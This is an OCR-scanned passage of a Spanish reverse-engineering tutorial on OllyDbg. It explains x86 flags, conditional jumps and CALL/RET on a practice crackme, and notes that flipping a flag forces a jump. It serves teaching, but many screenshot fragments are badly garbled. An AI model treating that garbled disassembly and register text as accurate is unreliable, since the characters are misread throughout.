p ES Froqaoo CALL <MP ek 2KERNEL32. GetModu leHand leA> 
a AS Ca204008  [MOU DWORD PTR DS: [4620CA1,EAX ES 


La tablita de la operación AND era 


. El resultado es 1 si los dos operandos son 1, y O en cualquier otro caso. 


1land1=1 
land0=0 
Oand1=0 
0and0=0 


Vemos que la única forma que el resultado sea cero es que ambos operandos sean cero (no 
interesan en este caso los casos de bytes diferentes pues EAX esta operando contra si mismo, por lo que 
ambos bytes siempre son iguales) pues si EAX en binario tiene algún bit que es 1, al hacer AND contra si 
mismo daría 1 y ya no podría ser cero el resultado. 


Pongamos EAX igual a CERO 


Increment 
Decrement 


Set to 1 102 CRACKME. BE 


Modify Enter ¡fe 32bir BCE 
Copy selection to clipboard CtrHC 123 32bit atFF 


Copy all registers to clipboard 100 NULL 

her ERROR_MOD_ 
View MIVDC registers 187 (NO,B,NE,E 

[ 
View 3DNow! registers Et 
View debug registers (6:3 

la.a 

0.0 
Appearance » 1.0000mBB00az 


1: 0000B0a0ane 


ea 
FST 4020 Cond160608 
FCW 027F Prec NEAR,S3 


En el OLLYDBG eso sea realiza fácilmente haciendo CLICK DERECHO en el registro a 
modificar y eligiendo ZERO. 


ntdll, 


ntdll, 
CRACKtT 


DD me 


> BRIBIODZ 
ES 9 


aaa aa 


ID 
om 
Ú 
Do 


LastErr ERRE 
EFL B4BBB246 (NO, 
STO empty —UNORM 


Vemos que se activo el flag Z o sea como sabíamos la operación AND entre dos valores que son 
cero es igual a cero y se activara. 


Si repito la operación con EAX diferente de cero 


BO00BZ00 
EDx 7C91EB94 ni 
EBX 7FFDOADOS 
ESP 0B12FFC4 
EBP BB12FFFO 
ESI FFFFFFFF 
EDI 70920738 nt 


EIP 604b1BB2 CF 


Apreto F7 


cul “Licurso nt 


EIP 00401002 CR 


0 *) LastErr ER 
EFL B4BBBZ66 (N 
STO empty —UNOR 


Y el FLAG Z no se activa al ser el resultado diferente de cero. 


Si uso la calculadora puedo comprobar que 390 AND 390 da como resultado 390 


En binario 390 es 1110010000 


Como la operación AND si ambos operandos son CEROS dará como resultado cero y si son dos UNOS 
dará como resultado UNO, vemos que el resultado no cambiará o sea será 390 en hexadecimal, y no se 


activara el flag Z. 


Hay alguna instrucciones mas de comparación pero estas son las principales llego el momento de ver los 


saltos 


SALTOS 


Todos as instrucciones de salto tienen un solo operando que es la dirección adonde saltaría el 


programa, veamos los diferentes tipos aquí en la tabla y aclarémoslos. 


JMP 

JE, JZ 
JNE. JNZ 
yS 

JNS 

JP, JPE 
JNP, JOP 
JO 

JNO 

JB, JNAE 
JNB, JAE 
JBE, JNA 
JNBE, JA 
JL, INGE 
JNL, JGE 
JLE, JNG 
JNLE, JG 


JMP 


salta 

salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 
salta si 


5 


es igual a cero 

no igual a cero 

signo negativo 

signo no negativo 

paridad par 

paridad impar 

hay capacidad excedida 

no hay capacidad excedida 
por abajo (no encima o igual) 
no está por abajo (encima o igual) 
por abajo o igual (no encima) 
no por abajo o igual (encima) 
menor que (no mayor o igual) 
no menor que (mayor o igual) 
menor que o igual (no mayor) 
no menor que o igual (mayor) 


Es el salto directo o incondicional, aquí no hay ninguna decisión SIEMPRE saltara a la dirección que nos 


muestra el operando por ejemplo veamos en OLLY 


$14) 4) + 1]ejm)T/w)H/c]/Jk]B)R]--Js] :=335)2] 


MP CRACKME. % 
CALL <JMP. ¿KERNEL32. GetModu leHand leA> 
MOU DWORD PTR DS: [4020CA],EAX 


PUSH O 

PUSH CRACKME. 064020F4 

CALL _<JMP. ¿¿USERS2.FindlindowA> 
OR EAX, EAX 

JE_SHORT CRACKME. 00401010 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR 
MOU DWORD PTR 
MOU DWORD PTR 
MOY EAX, DWORD 


wEB 2 
ES FFO40006 
AS CAca4ona 
6A Bu 
63 F4204000 
ES A6040B0B 
DECO 


DS: [402070], 0 
PTR_DS: [4026CA] 


DS: [402068], CRACKNME. ln dPr: 
B206CJ1,0 


Al ejecutar ese salto el programa ira a 401031 y seguirá ejecutándose desde allí. 


Tenemos un par de lindas configuraciones del OLLY para los saltos que les enseñare aquí, así son mas 


visibles los mismos. 


Si vamos a OPTIONS-DEBUGGING OPTIONS 


1 Window Help 

FE Appearance | 
El Debugging optio P 
“Du Miré in bi dee inmi. 

Y allí en la pestaña CPU 


Debugging options (A 


Security | Debug | Events | Exceptions | Trace | SEX | Stings | Addresses | 
Commands | Disasm CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 


[” Synchronize source with CPU 
ÍY' Underline fizups 
[Y Show direction of jumps 
Show jump path 
Show grayed path if jump is not taken 
Show jumps to selected command 
[Center Follow-ed command 


J 
Number of visible lines after stepped command [Default + 


Marcamos estas tres tildes 


SELUMY | LVELUY | EYEMs 1 EXCEPUUrS 1 


Commands | Disasm CPU | Registers | Stack | Analysis 1 


Hate 1 2rA | Sumys | HAuUIESSES | 


Analysis 2 | Analysis 3 


” Synchronize source with CPU 
ÍY' Underline fizups 


[Y. Show jumps to selected command 
| Center 'Follow'-ed command 


Default vw 


Number of visible lines after stepped command 


Vemos que la información es mucho mayor ahora y mas visible 


“PES Froqaaoa E ñ UGetModu LeHandleñ 
ñs CAa204006 |MOU DWORD PTR DS:[4820CA1,EAX 


6A BB PUSH A Title = NULL 

68 F4204000 |PUSH CRACKME. 004020F4 ES = = "No need to disasm the codet” 
Es A6u4B00B FindilindowA 

DECO OR EAX, EAX 


MOU DWORD PTR DS: [40206C],0 
MOU DWORD PTR DS: [402070],0 
ñ1 CAzogana | MOU EAX,DWORD PTR DS: [4026CA] 
AR 24249464 1 MU MINRA PTR NS: 14424741. FAX 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], CRACKME. ln dPyr: 


Vemos que OLLYDBG ahora nos muestra con una flecha roja que va a saltar y además a adonde va a 
saltar, exactamente a 401031. 


Si ejecuto ahora con F7 


CEESMETOA EFE +0) ul +) ujejmtiwn]cj7[x]8 


01 SvrEB 2F JMP SHORT CRACKME. 00401031 
Es FFo4o0u0 | CALL <IMP-SKERNELS2. GetModuleHandleAs  |LGetModu leHanc 
AS MOU DWORD PTR DS: [4020CA],EAXx 


. [6H 66 PUSH O Title = NULL 

. (68 F4204000 |PUSH CRACKME. B04020F4 [class = "No r 
a . [ES A664006b FindWindowA 
40 . | BBCO OR EAX, ERX 


y 


£ 


B 


” 
as. 


MOU DWORD PTR DS: [402064], 4003 


.o. yen 


Ai MOU EAX, DWORD PTR DS: [4026CA] 
03 74304004 | MAI MINA PTR NMS-+T4a4741 FOY 


Se realizo el salto y EIP es 401031 


EBFP YU1ZFFFYU 
s FFFFF 


Ya que EIP apunta a la instrucción que se va a ejecutar a continuación, en este caso 401031. 


JE o JZ 


Ambos son el mismo tipo de salto condicional y pueden escribirse de las dos formas ya vimos que JZ 
saltara cuando el flag Z sea cero. 


12 HL YI YY LED Lag Io A DU AY nap 


CMP_EAX, ECX 
JE SHORT CRACKME. 60401031 


NOP 
NOP 
MOU DWORD PTR DS: [4020CA],ERX 


PUSH A Tit 
PUSH CRACKNME. 004B20F4 L [ la 
in 


DDD 


OR EAX, ERX 


£ 


Do 
e. 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], A Won dPr; 
MOU DWORD PTR DS: [49206C],0 

MOU DWORD PTR DS: [402070], 


308 


Escribamos en OLLYDBG dos instrucciones una comparación y el salto así verificamos como funciona. 


. un 


Pongo EAX y ECX iguales 


DOBB2006 
ECX 00002000 
EDx 7C91EB94 ntd 
EBX 7FFOAGOS 
ESP 0B12FFC4 
EBP 0B12FFFO 
ESI FFFFFFFF 
EDI coral ntd 


EIP 604610], + CRA 


C 1 ES 0023 32b 
e 


Al ejecutar la comparación se realiza la resta y como ambos son iguales se activa el FLAG Z al ser el 


resultado CERO. 


ntdll.l 


ntdll.” 
CRACKNI 
E: ¡ 


2 NULL 
 ERROR_I 
000BB246 (NO, NB 


3 empty -UNORM BC 
empty 
empty 


Y rms 


La siguiente instrucciones es el salto condicional veamos 


[c] File View Debug Plugins itund Window Help 


CMP_EAX, ECX 
¿SHORT CRACKME. 90401031 


Nor 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 
PUSH B 

PUSH CRACKNME. B04020F4 

OR EAX, ERX 


ES 


ne. 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], CRACKME. ln dPx: 
MOU DWORD PTR DS: [402660], 
MOU DWORD PTR DS: [402070], 
MOU EAX, DWORD PTR DS: [4026CA] 


ú nunan 


MA FAN ANA 


OLLYDBG ya nos avisa la decisión y como el FLAG Z esta activado nos muestra en rojo que va a saltar, 
si la indicación estuviera en gris quiere decir que la decisión es no saltar, en este caso saltara, apreto F7. 


CMP_EAX, ECX 
JE SHORT CRACKNME. 604010631 


N 

NOP 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 

PUSH B Tit 

PUSH_CRACKME. 004020F4 (cta : 
tn 

OR EAX,EAX 


¿Ep rORT CRACKME. 89491910 


MOU DWORD PTR DS: [402064], 4003 
2 MOU DWORD PTR DS: [402068], CRACKME. ln dPr 
at MOU DWORD PTR DS: [40206C],0 
MOU DWORD PTR DS:[402070],0 
MOU EAX, DWORD PTR DS: [4026CA] 
MOU DWORD PTR DS: [492074], EAX 
PUSH 64 


DOE 
Qu — 
Ziñ Mm 


£ 


a. 


.. . + yen 


PRsrcr 


Allí vemos que salto y EIP ahora es 401031. 


Repitamos el ejemplo con EAX diferente de ECX 


isters (FPU) 
——JERX BOBBZ00B 
ECX 40001090 
EDX 7C91EB94 ntd 
EBX 7FFDAGOO 
ESP BB12FFC4 
EBP OB12FFFO 
ESI FFFFFFFF 
EDI 70920738 ntd 


EIP 606401008 CRA( 
ra FSaR72 22 


Al apretar F7 en la primera instrucción como el resultado no es cero, el flag Z no se activa. 


EIP 60401062 CRE 


o 
o 
m 
un 
o 
o 
mr 
100) 
0 
10 
rr 


ODAHNMFDD 
SODIDo 
mn 
mn 
o 
o 
11] 
om 
0 
10 
rr 


LastErr ERF 
EFL 00000206 (NC 
empty ¿HNORr 


nerds 


nu 
43 
o 


Y vemos en OLLY 


CHP HORT-CR 


JE SHORT CRACKME. 06401031 
NOP 


NOP 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 
PUSH B 1 
PUSH CRACKNME. 604020F4 [: 
OR EAX, EAX 


¿Er prORT CRACKME. 60481610 


104 MOU DWORD PTR DS: [402064], 4003 
10 MO ADS PTR DS: [402068], CRACKME. ln dPr 
201 MOU DWORD PTR DS:[40206CJ,0 

24 MOU DWORD PTR DS: [402070],0 


MOU EAX, DWORD PTR DS: [4820CA] 
MO MINA PTR MS-=TáaA741 FOY 


Que como el JE salta si el flag Z es UNO, en este caso no saltara, y la flecha del salto esta gris, al apretar 
F7 nuevamente 


CEEI PEE EEE EEE 


CMP_EAX, ECX 
E SHORT CRACKNME. 66401631 


NOP 

NOP 

MOU DWORD PTR DS: [4026CA],EAX 
PUSH B 

PUSH _CRACKME. 004B020F4 

OR ERXx, EAX 


ge AHORT CRACKME.. 99491910 


A4 MAA MARA PTR MS: 1442441. 44423 


NULL 
"No nee 


dowA 


Dí 


DD E 

DOD 
o | 
NO 
5u7+ 
Qñ — 
Eno 
Sun 


Vemos que no salto y siguió a continuación en 401004, esto que parece tan tonto es la base de la 
comparaciones y decisiones en todos los programas. 


Si repito el ejemplo anterior y llego al salto, nuevamente y no va a saltar 


CEE a EEE 


CMP_EAX, ECX 
mz SHORT CRACKME. 00401031 


NOP 

NOP 

MOV DWORD PTR DS: [4026CA7,ERX 
PUSH B 

PUSH _CRACKME. B04B20F4 

OR ERX, ERX 


DOE 


DOE 
rr 
No 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], CRACKME. ln dPr: 
MOU DWORD PTR DS: a 
MOU DWORD PTR DS: [402070], 

MOV EAX. DWORD PTR DS: C4D26cA] 


Sabemos que no salta porque el flag Z esta a cero, ahora que ocurre si hago doble click en el flag Z y lo 
cambio a 1. 


CMP_EAX, ECX 


ara SHORT CRACKME. 004010831 

Nor 

NOP 

MOU DWORD PTR DS: [4820CA],EAX 
PUSH _CRACKME. 004020F4 [ 
OR EAX,EAX 


gn No DWORD PTR DOS Eaoonca 1 4003 
TE 402068], CRACKME. WndPr 
00 nou DWORD PTR Ds: si Ea0s08CT: 9] 

7] 


MOU EAX, DWORD PTA DS: [4026CA] 
MOU DWORD PTR DS: [402074],EAX 


Vemos que la flecha cambio a rojo y OLLYDBG saltara, independientemente de la comparación, 
manipulando directamente el flag, ya que la decisión se toma sobre el estado actual del mismo, si cambia 
el flag cambiara el salto. 

Los otros saltos los veremos rápidamente con un ejemplo cada uno 


JNE o JNZ 


Es el opuesto al salto anterior en este caso, salta si el flag Z no esta activo o sea si el resultado de la 
operación fue distinto de cero. 


ads Jl Si Hu al | Uelaltiela: 


P EAX, ECX 
se SHORT CRACKME. 08401031 


NOP 
NOP 


MOLI MAANA ATA NFS. TAnAaASAT? PF 


OA POOTRARaa 


Allí escribo la comparación y el JNZ 


Si EAX y ECX son iguales se activa el FLAG 0 al ser la diferencia CERO 


¡DANDO 


LastErr 
EFL B4bBBZ246 


PNTOA mas TN 


¡A A] ra Y ICGvY LILA U ng > dl > VU IA YY 1 pp 


EEE ESPERE EEES 


CMP E 
via SHORT CRACKNE. pB4B1031 


Nor 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 
PUSH B 


Title = NULL 
PUSH CRACKME. BB4020F4 (stas: = "No ne 
FindtlindowA 


OR ERX, ERX 


% 


o 
nen 


OU DWORD PTR DS: [402064], 4003 
OU DWORD PTR DS: pel BCE: WndPr: 
OU DWORD PTR DS: [40206C7,50 

OU DWORD PTR DS: E4o20701; [2] 


as 
í A CNY MNDN DTD MC. PARANA 


por 
as. 


Y al revés que el JZ que saltaba al estar el FLAG Z activo este es el opuesto, salta cuando el FLAG Z es 
cero o esta inactivo. 


Se puede entender que si pongo EAX diferente de ECX, el resultado será diferente de cero y el flag Z 
quedara inactivo y allí si saltara. 


JS 


Como vemos en la tabla saltara si la comparación da un resultado negativo o sea si EAX en menor que 
ECX en el ejemplo anterior. 


CERBCrE E Perra PrpE 
Se SHORT CRACKNE. 00461031 

NOP 

NOP 


NOP 

MOV DWORD PTR DS: [4026CA7,ERX 

PUSH O 

PUSH _CRACKME. B04020F4 [ 
SAI <IMP.MISFRA2.FindilindAnmuA> 


E 
ECX 0B0BBSsan 


ESP BB12FFC4 
EBP ODI2FFFO 
ESI FFFFFEFF 
EDI 70920738 ntc 
EIP 00401000 CR£ 


NN 


Al apretar F7 


ESI FFFFFFI 
EDI 709207: 


EIP 004010: 
Ci ES 00 
cs 


ODANMNDO 
o S 
ono 
OJO) 

oo 
pre 


LastE 
EFL M0BBB2: 


STO empty 
STi ommtu 1 


El FLAG S se pone a 1 y saltara al ser negativo, 


-— E car ADA EDAAAR E Je E EE 


Hua] 3] Jm 198] 0) J5]8]r 


CMP_EAX, ECX 

JS SHORT CRACKME. 404010931 

NOP 

NOP 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 

PUSH Title = NULL 

PUSH CRACKME. B049020F4 [8tass = "No nee 
FindllindowA 


OR SHORT O 


24 MOV DWORD PTR DS: [402064], 4003 

234 MOV DWORD PTR DS: [402068], CRACKME. ln dPyr: 
MOU DWORD PTR DS: [40206C],0 
MU AMARA PTR NS: 14424741. HA 


ID 
Zn 


Allí vemos que la flecha roja nos indica que saltara, en el caso que EAX sea mayor que ECX el flag S no 
se activara al ser un resultado positivo y el salto JS no saltara. 


JNS 


Es el opuesto al anterior saltara cuando el FLAG S este a cero o sea cuando el resultado sea positivo, en el 
ejemplo anterior cuando EAX sea mayor que ECX. 


JP o JPE 


En esta caso el salto condicional JP saltara cuando el FLAG P este activo y esto ocurrirá como habíamos 
visto cuando el resultado de la comparación tenga paridad par o par cantidad de unos al verlo en binario. 


MAS A] Aja] a $85) 221 2] IN IN O O E A 


CMP EAX, ECX 
a SHORT CRACKME. 00401031 


El 

po0D0BB1S 
EDxX 7C91EB94 
EBX 7FFDAGOO 
ESP BB12FFC4 
EBP BO12FFFO 
ESTIREEFEREE 
EDI 7C920738 


EIP 00461002 


Ponemos EAX a 20 y ECX a 18 y apretamos F7 


CUL UICN 


EIP 0040100 


ES B02 
Cs Bai 
ss 6B2 
B Ds 002 
B 
B 
B 
B 


FS 003 
GS 600 


LastEr 
EFL 0400021 


nro . 


Como la diferencia entre EAX y ECX es 2 y este pasado a binario es 10 que tiene 1 solo uno o sea una 
cantidad impar de unos, el flag P no se activa y el JPE no saltara. 


CMP_EAX, ECX 


vaa SHORT CRACKME. 60401031 
NOP 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 
PUSH B 

PUSH CRACKME. 004020F4 [: 
OR ERX, ERX 


NUL 
"No 
FindilindowA 


4 MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], CRACKNE. lin dPre 


71113 
poBBaBi17? 
EDx 7C91EB94 ntdl 
EBX 7FFDAGOS 
ESP 0B12FFC4 
EBP 0B12FFFO 


ESI FFFFFFFF 
EDI 70920738 ntdl 


EIP 00461002 CRAC 


LA III 


EIP 00401002 
ER ES 0B23 : 
CS BB1B 
SS 6023 
B DS 0023 
B FS 003B 
5 GS 6000 
AB LastErr 
EFL 00000216 
STO empty —UN 


STi empty 6.0 
ST2 empty 4.0 


Vemos que al ser el resultado 3 que en binario es 11 y tiene un número par de unos, entonces allí si se 
activa el FLAG P y el JPE saltara. 


a] +] 1 JEJm]1)w)H c] 2] 


CMP_EAX, ECX 
Ta SHORT CRACKME. 60401031 


NOP 
NOP 
43 Ca204006 |MOU DWORD PTR DS: [4020CA],EAXx 
A Be PUSH B Title : 
PUSH CRACKME. BB4020F4 (stas: 
FindWii 
OR EAX,EAX 


204 MOU DWORD PTR DS:[402064], 4003 

104 MOU DWORD PTR DS: [402068], CRACKME. ln dP yr: 
304 MOU DWORD PTR DS: [40206C],0 

24 MOU DWORD PTR DS:[4020707,0 

MOV EAX. DWORD PTR DS: [4626CA1 


nan 


Es el opuesto del anterior o sea este salta cuando el flag P esta a cero o sea la paridad es impar, en el 
ejemplo anterior hubiera saltado la primera vez cuando el resultado era 2 y no hubiera saltado cuando el 
resultado era 3, al revés del JP. 


JO 


Este salta cuando hay overflow o capacidad excedida lo cual activa el flag O. 


, 
JO SHORT CRACKME. 66401031 
NOP 
NOP 
NOP 
MOU DWORD PTR DS: [4020CA1,EAXx 
PUSH O 
PUSH CRACKME. 0046020F4 


[ 


Aquí cambiamos la comparación porque para activar el FLAG O hay que hacer OVERFLOW y esto es 


posible mediante una suma. 


0O0BODB0D 
7EFDAGOS 
0012FFC4 
O012FFFO 
FEFFFFFF 
70920738 ntdll 


0401000 CRACk 


CO ES 0623 32bit 
P1 CS 0616 32bit 
AB SS5 6623 32bit 


Apreto F7 


EIP 60401002 


ES 6B23 
Cs 061B 
Ss BB23 
Ds 6BB23 
FS 603B 
Gs 0000 


ERAC 
32bi 
32bi 
32bi 
32bi 
32bi 
NULL 


ERRC 
EFL 0000B8A96 (0,t 
sTo empty ZUNORM 


ADD_EAX, ECx 


JO SHORT CRACKME. 60401031 

NOP 

NOP 

NOP 

Es DWORD PTR DS: [4620CA7,EAX 
PUSH CRACKME. 604020F4 

OR EAX, ERX 


24 MOL rs PTR DS: [402064], 4003 
1504 MOU DWORD PTR DS: [462068], e WndP re 
4001 MOU DWORD PTR DS: [40206CJ,0 
24 MOU DWORD PTR DS: [4020707.0 


nta tata 


NULL 
"No need t 


dowA 


Y el JO saltara al haberse activado el FLAG O por OVERFLOW o capacidad excedida. 


JNO 
Es el opuesto al anterior este salta cuando el FLAG O esta a CERO o sea no 
JB 


Salta si es mas bajo, veamos el ejemplo 


hay OVERFLOW 


Y TAS VAS SS AY AS SY a O O A A O a O 


NETA 


SAARALA 
a pp pp 


00061006 

5151510151515] 
EDx 4BBBBaBO 
EBX 7FFDAGOS 
ESP BO12FFC4 
EBP BO12FFFO 


ESI FFFFFFFF 
EDI 70920738 ntdll 


EIP b04B1002 CRACK 


Co ES 0023 32bit 
P.1 CS 001B S2bit 


CMP_EAX, EC 
di CRACKNME. 664010631 


NOP 

NOP 

MOU DWORD PTR DS: [4020CA],EAX 

PUS Title 
PUSH_CRACKME. 004020F4 [£tas: 
CALL_<JMP. SUSER32. FindWindowA> Findll 


no EnNVY ENY 


Vemos que EAX es mas bajo que ECX o sea que debería saltar, al apretar F7 


GS BBB 


LastErr 
EFL 00BBB2S7 
STA emmtu —l 


ODANNDDO 
DOOR 

a] 

un 

pot] 

pu] 

0 

m 


El flag C se activa, ya que tiene que al hacer la diferencia que da un numero negativo, en el bit mas 
significativo o sea el primero habrá acarreo y eso activa el FLAG C, y según eso decide el JB en 


resumidas cuentas si EAX era menor que ECX. 


JNB 


Es el opuesto de JB saltara si el FLAG C es cero o sea no hay acarreo porque el resultado fue positivo, lo 
cual supone que EAX fue mayor que ECX y al revés que el anterior este saltara en ese caso. 


JBE 


Este salta si es mas bajo o igual o sea testea dos flags a la vez ve si el FLAG C esta activo en ese caso 
salta, y también verifica si el FLAG Z esta activo con el cual también salta, o sea si EAX es igual a ECX 
saltara y si es menor también. 


[0] File View Debug Plugins Options Window Help 


24 MOU DWORD PTR DS: [402064], 4003 


Ad AA MAA MATA MA ARANA OAAACAIAS lid de 


EKIEJA pel mi vie] $0) ul + Ljejmt[wnH]cjs]r 


CMP EAX, ECX 

2 SHORT CRACKME. 08401831 
NOP 

NOP 

MOU DWORD PTR DS: [4020CA],ERXx 
PUSH B 

PUSH CRACKME. 004020F4 


OR ERX, ERX 


Ponemos como primer caso que EAX y ECX sean iguales 


000B0Baa 


7FFDAGOS 
BOL2FFC4 
GOL2FFFO 
FFFFFFFF 
70920738 ntdll.71 


EIP b0461002 CRACKME, 


C1 ES 0023 32bit Bl 


P1 CS 001B S2bit Bl 
DA 22 04792 27hir Al 


' 66401002 CRACt 


Rom 


) 32b 

3 MULL 
LastErr ERROF 
FL 600246 (NO,t 
STO empty —UNORM E 


DOANNDDO m 


cos 


(06 mo 
- 
o 


Al ver que el flag Z esta activo salta 


CMP EAX, ECX 
vi2 SHORT CRACKME. 06401031 


NOP 

NOP 

MOU DWORD PTR DS: [4820CA],EAXx 
PUSH B 


Title = NU 
PUSH CRACKME. BB4020F4 (eta: EN 
FindWindow 


OR EAX, EAX 


£ 


nr”. 


DWORD PTR DS: [492064], 4903 
DWORD PTR DS: [492068], CRACKME. lindPrk 
DWORD PTR DS: [49206C],0 

) DWORD .PTR DS: [4920783,8_. 


.o sn 


X 
00000000 
7FFDAGOD 
BOL2FFC4 
GO12FFFO 
FFFFFFFF 
70920738 ntd. 


EIP 00461002 CRACUN 
c BES 0023 32bit 


1 Fo aatD 22hi+ 


Apreto F7 


EDI 71 
EIP 004819 

ES 092 
CS E 


ls] 


HNMNDTDO 


¿c-o0 mu 


o 


LastEr 
(alololel= 


m 
a 
Fr 


STO empty - 
sT1 empty a 


En este caso se activa el FLAG C al ser resultado negativo que usa un carry en el bit mas significativo, o 
sea salta cuando EAX es menor a ECX también 


En el ultimo caso que EAX es mayor a ECX repito el ejemplo apreto F7 


DANRNDDO rm 


OB Last 


ho 


CMP_EAX, ECX 
vi2 SHORT CRACKME. 606401031 


NOP 

NOP 

MOU DWORD PTR DS: [4026CA7,EAX 
PUSH B 


a H Tit NULL 
a10 PUSH CRACKME. B04020F4 ES = "No need 
B10 FindWindowA 


OR ERAX, EAX 


MOU DWORD PTR DS:[492064],4903 
MOU DWORD PTR DS: [492068], CRACKME. lndPr 
MOU DWORD PTR DS:[48206CJ,8 

MOU DWORD PTR DS:[4020701,0 

MOU EAX, DWORD PTR DS: [4926CA] 

MOU DWORD PTR DS:[482074],EAX 


er .. emo 


O sea la conclusos es que JBE salta si EAX es mas bajo o igual que ECX en el ejemplo. 
JNBE 


Es el opuesto al anterior, salta si el flag Z y el FLAG C son cero ambos o sea solo en el ultimo ejemplo 
anterior cuando EAX es mayor que ECX, allí ambos flags están a cero y este JNBE saltara. 


IL 


en este caso JL salta si es menor, pero en diferente forma, veamos aquí mira si FLAG S es diferente a 
FLAG O y en ese caso salta 


Veamos en los ejemplos cuando se da esto si ambos EAX y ECX son positivos siendo EAX mayor que 
ECX 


max] el] visi $43] + LjEjmM]T]w|H|c 
> sl SHORÍ CRACKNE.SO491891 
NOP 


NOP 

MOU DWORD PTR DS: [4026CA7,EAX 

PUSH B id; 
PUSH CRACKME. B04020F4 [ci 


Al apretar F7 no salta ya que EAX es mayor que ECX y el resultado es positivo lo que no activa el FLAG 
Oniel FLAG $. 


EIP 66401002 
CO S BB22 
P 1 CS BB1E 
AG 15] 
Za a 
sm a 
TO a 
DA 

om 

EFL..e 


Mn 
mMm1 


RaM 


Si EAX es menor que ECX pero ambos son positivos repito el ejemplo 


DOE 
7 o 
0 Ti TE 


JNE 
On: 


IP 00401002 


ll 
1 
a 
A 
mi 
a 


DOANTNDDO m 


Mna 


Caso. 


FFFFFFF? 
ECX ¡BOBBBOBÍ 
EDX DOBBBOdO 
EBX 7FFDADOO 
ESP BB12FFC4 
EBP OBÍ2FFFO h 


ESI FFFFFFFF 
EDI 70920738 nt 


EIP 06401002 CRAC 
Pai Faaa72 22h: 


En este caso EAX es menor que ECX, ya que es un número negativo veamos que pasa 


Salta perfectamente porque es menor pero que pasa si usamos estos dos mismos valores con el otro salto 
que parece realizar el mismo trabajo el JB 


Registers (MMXx) 
FEFFFFF? 
D0DBDBB1 


[mes 
a, 


DO mmmmmmmm 


' Ba4u1BB2 CRE 
ES M6 , 


Al apretar F7 


ax] ejt] el a) + DEMTIMA] 


EAX, ECX 
JB_SHORT CRACKME. 60401631 
NOP 
NOP 
NOP 
MOV DWORD PTR DS: [4026CA7,EAX 
PUSH B 
PUSH CRACKME. B04020F4 [ 


OR EAX, EAX 


ma — 


£ 


y] 


OU DWORD PTR DS: [402064], 4003 
OU DWORD PTR DS: [402068], CRACKME. ln dPyr+ 
OU DWORD PTR DS: [40206C7,0 

DS: [4020707,0 
PTR_DS: [4026CA] 
Ns: 14424741. FAX 


e. 


Vemos que el JB no salta quiere decir que JB compara ambos como si fueran positivos o SIN SIGNO 
mientras que si el salto debe considerar el signo de lo que compara se utiliza JL esa es la principal 
diferencia entre ambos. 


| | La comparación se realiza con 

| Para saltar si | Números sin signo | Números con signo 
El destino es más grande que la fuente | JA JG 

Destino es igual a la fuente | JE JE 

El destino no es igual a la fuente JNE JNE 

El destino es menor que la fuente | JB JL 

El destino es menor o igual a la fuente JBE JLE 

El destino es más grande o igual a la fuente JAE JGE 


Aquí vemos en esta los saltos condicionales según queramos considerar el signo de lo que comparamos o 
no, 


Vemos que JA, JB JBE y JAE consideran ambos operandos positivos mientras que JG, JL, JLE y JGE 
consideran los operandos con signo, JE y JNE se comportan igual en ambos casos. 


Creo que con esto hemos aclarado el tema de los saltos condicionales y las comparaciones, en la práctica 
mas adelante veremos su utilización en los programas lo cual nos será mucho mas liviano que esta pesada 
tarea de revisarlos a casi todos. 


Queda en la ultima parte de ASM por suerte ver los calls y ret, y los modos de direccionamiento ya casi 
llegamos al fin de lo duro paciencia jeje.. 


Hasta la parte 7 
Ricardo Narvaja 
16 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG Parte 7 


Los CALL y RET 


He dejado algunas instrucciones para esta ultima parte porque creo que a esta altura ya tienen claro 
algunas cosas, y es mejor explicar estas ultimas instrucciones ya teniendo una pequeña base, ahora 


explicaremos los CALL y RET. 


Esta instrucción aunque parezca su funcionamiento sencillo, muchos de los newbies no comprenden 
realmente su funcionamiento, por eso quería dedicarle un espacio importante e insistir en repasar toldo lo 
anterior, pero ademas mirar de entender muy bien el funcionamiento de los CALL y RET yo creo que es 
algo muy importante para el cracking. 


Carguemos nuevamente nuestro crackme de ejemplo el CRACKME DE CRUEHEAD en OLLYDBG, 


Para practicar hagamos click derecho en el listado desensamblado en cualquier línea y elijamos GO TO — 


EXPRESSION 


[€] File View Debug Plugins Options Window Help 


A Ba 
ÉS FFO40000 

3 CA204000 
E [7] 

3 F4204000 
ES R6040000 
197] 


E 
ES D1030000 
68 BO7FOBBa 
ES A2030000 
AS 


70204000 
c7as 
C705 24204: 
C7a5 Se204001 


64204000 
ES ei 


A Ba 
68 BOSaBaaa 
68 BUSaBaaa 
A SE 


68 B4000000 
68 BOBACFOO 


117] 


PUSH 8 


MOU DWORD PTR DS: [4020CA],EAX 


PUSH CRACKME. BB4920F4 
OR EAX,EAX 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068], CRACKME. lWndPy 
MOU DWORD PTR DS: [40206CJ,0 


MOU DWORD PTR DS: [ 


402 
MOU EAX,DWORD PTR DS: [48260] 
OECD PTR DS: [402074],EAX 


PUSH EAX 


Mou EOS PTR DS: [402078],EAX 


ENen Bt 


CALL SAMP. guSER92. LoadCursorA> 

MOU DWORD PTR DS: [40207C1,EAX 

MOU DWORD PTR DS: [482080],5 

MOU DWORD PTR DS: [402084],CRACKME. 0 
MOU DWORD PTR DS: [402088],CRACKME. 8 


PUSH CRACKME. 00492064 


PUSH A 
PUSH s9ua 
PUSH 8008 
ESA 3 


DE4 
PUSH BCFOn 
PUSH CRACRNE. DO4B20E7 
PUSH CRACKME. 004020F4 
PUSH A 


USH O 
FF35 CA204001 PUSH DINORD PTR DS: [4820CA1 
A Da PUSH A 


CORBERA EE a 


pModule = NULL 
GetlModu leHandleA 


Title = NULL 
